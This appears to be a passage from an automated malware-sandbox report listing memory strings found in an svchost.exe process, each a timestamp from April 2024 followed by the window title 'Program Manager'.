              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:49:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:48:58 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:27:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:45:16 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:37:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:25:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:14:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:11:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:29:56 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:54:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:43:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:39:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:10:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:03:04 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:47:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:41:10 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:58:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:51:25 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.0000000003E91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:27:36 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 14:37:24 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:46:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:36:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 14:16:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:01:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:52:46 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:19:58 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:33:23 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:58:36 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:13:16 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:39:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:55:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:15:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:04:25 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:41:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:10:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:47:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:47:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:22:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:49:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:23:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:48:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:43:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:06:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:14:41 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:22:55 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:00:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:34:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:34:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:07:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:26:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:51:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:04:15 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:46:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:36:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:54:20 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:50:52 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:49:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:43:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:44:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:52:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:35:25 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:28:42 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:08:49 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:39:03 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:55:59 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:00:02 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:20:13 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:59:17 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:24:29 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:45:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:59:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:47:55 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:45:43 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:55:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:42:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:09:42 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:03:32 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:37:22 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:59:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:51:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:27:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:59:47 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:40:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:16:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:28:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:24:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:24:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:59:07 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:16:15 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:22:45 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:18:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:20:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:42:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:05:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:54:58 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:38:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:31:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:30:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 11:53:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:33:03 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:38:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 20:41:55 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:56:42 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:41:07 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:10:32 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:46:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 18:39:58 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:13:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:03:52 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:17:46 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:49:29 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:18:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:10:45 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:58:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:01:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:08:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:15:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:51:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:22:58 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:07:10 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:28:07 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:48:38 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:36:56 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:13:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:07:58 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:54:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:36:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:04:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:52:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:04:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:39:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:07:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:44:02 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:25:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:46:24 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:56:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:00:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:33:54 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 04:19:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:36:17 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:25:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.0000000003B42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:32:32 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:15:54 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:40:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:12:30 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:53:07 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:59:58 - Program Manager
